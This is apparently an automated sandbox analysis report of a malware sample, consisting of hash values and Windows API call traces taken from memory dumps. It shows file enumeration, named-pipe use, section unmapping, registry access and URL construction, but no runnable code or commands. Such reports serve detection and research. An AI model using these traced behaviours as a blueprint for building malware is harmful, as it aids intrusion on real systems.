  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
